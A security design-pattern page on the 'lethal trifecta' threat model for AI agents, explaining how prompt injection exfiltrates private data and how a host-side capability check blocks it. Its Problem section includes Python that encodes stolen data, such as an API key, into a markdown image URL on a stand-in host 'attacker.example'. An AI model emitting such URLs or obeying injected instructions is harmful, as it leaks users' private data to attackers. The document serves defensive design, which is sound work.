Safety & Control

Lethal Trifecta Threat Model

Block prompt-injection-driven exfiltration by ensuring that no single agent execution path combines all three of the following: access to private data, exposure to untrusted content, and an outbound communication channel.

Problem

An attacker needs to plant only one well-crafted prompt-injection payload in any piece of untrusted content the agent will read. Once that payload reaches a model that also has access to private data and an outbound channel, the injection can instruct the model to fetch the private data and send it out. The model has no reliable way to refuse, because it cannot reliably tell instructions embedded in data apart from instructions in the system prompt. Filtering the untrusted content is unreliable, and so is prompting the model to ignore embedded instructions. The outbound channels are also easy to overlook: image URLs, link previews, error reports, and ordinary tool calls can all serve as exfiltration paths.
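
A minimal Python sketch of the image-URL channel, assuming a chat client that automatically fetches any image the model emits in markdown. The host `attacker.example` and both function names are hypothetical. The point is that no tool call is involved: rendering the reply is enough to deliver the data to the attacker's server log.

```python
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical attacker host; .example is a domain reserved for documentation.
ATTACKER_HOST = "attacker.example"


def injected_image_markdown(stolen: str) -> str:
    """Markdown that an injected instruction might ask the model to emit."""
    # urlencode percent-encodes the payload, so any text fits in the query string.
    query = urlencode({"d": stolen})
    return f"![loading](https://{ATTACKER_HOST}/pixel.png?{query})"


def what_the_attacker_receives(markdown: str) -> str:
    """Recover the payload from the image URL, as the attacker's access log would."""
    # Parentheses inside the payload are percent-encoded, so the last ")" closes the link.
    url = markdown[markdown.index("(") + 1 : markdown.rindex(")")]
    return parse_qs(urlparse(url).query)["d"][0]


if __name__ == "__main__":
    md = injected_image_markdown("api_key=sk-123 (prod)")
    print(md)
    print(what_the_attacker_receives(md))
```

Because the client fetches the image as soon as it renders the reply, this channel counts as outbound communication even when the agent has no network tools of its own.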

Solution

Model the three capabilities (**private-data read**, **untrusted-content ingest**, and **outbound communication**) as capability tags on every tool and data source. For each agent execution path, enforce at orchestration time that at least one of the three is absent. Concrete moves: split the agent into two runs (one that reads private data, one that reads untrusted content); strip outbound network access from any run that touches both; or sanitise untrusted content into typed fields before it reaches a private-data context. The host enforces this check itself rather than delegating it to guardrail prompts.
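
A minimal Python sketch of the host-side check, assuming each tool or data source carries its capabilities as an `enum.Flag` set. `Cap`, `Tool`, `check_path`, `strip_outbound` and the three example tools are hypothetical names, not part of any agent framework. A path's capabilities are the union of its tools' tags, so the invariant becomes a single mask comparison.

```python
from dataclasses import dataclass
from enum import Flag, auto


class Cap(Flag):
    """Hypothetical capability tags for tools and data sources."""
    NONE = 0
    PRIVATE_DATA = auto()     # reads data the operator wants to keep private
    UNTRUSTED_INPUT = auto()  # ingests content the operator does not control
    OUTBOUND = auto()         # can reach a destination the operator does not control


TRIFECTA = Cap.PRIVATE_DATA | Cap.UNTRUSTED_INPUT | Cap.OUTBOUND


@dataclass(frozen=True)
class Tool:
    name: str
    caps: Cap


class TrifectaViolation(Exception):
    """Raised by the host when one execution path would hold all three capabilities."""


def path_caps(tools: list[Tool]) -> Cap:
    """Union of the capabilities of every tool and data source on one path."""
    caps = Cap.NONE
    for tool in tools:
        caps |= tool.caps
    return caps


def check_path(tools: list[Tool]) -> Cap:
    """Host-side check: at least one of the three capabilities must be missing."""
    caps = path_caps(tools)
    if (caps & TRIFECTA) == TRIFECTA:
        names = ", ".join(t.name for t in tools)
        raise TrifectaViolation(f"path [{names}] holds all three trifecta capabilities")
    return caps


def strip_outbound(tools: list[Tool]) -> list[Tool]:
    """One remediation: drop every tool that can talk to the outside world."""
    return [t for t in tools if not (t.caps & Cap.OUTBOUND)]


# Hypothetical tool catalogue for illustration only.
read_inbox = Tool("read_inbox", Cap.PRIVATE_DATA | Cap.UNTRUSTED_INPUT)  # private mail anyone can send to
search_notes = Tool("search_notes", Cap.PRIVATE_DATA)
http_get = Tool("http_get", Cap.UNTRUSTED_INPUT | Cap.OUTBOUND)  # query strings can carry data out

if __name__ == "__main__":
    print(check_path([search_notes]))
    try:
        check_path([read_inbox, http_get])
    except TrifectaViolation as err:
        print("rejected:", err)
    print(check_path(strip_outbound([read_inbox, http_get])))
```

Note that a single source such as an inbox can carry two legs at once, which is why the check runs on the union over the whole path rather than tool by tool. Splitting the agent into two runs corresponds to calling `check_path` separately on each run's tool list.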

When to use

  • The agent processes content the operator does not control.
  • The same agent has access to data or credentials the operator wants to keep private.
  • The tool catalogue includes any tool that can reach a destination the operator does not control.

Related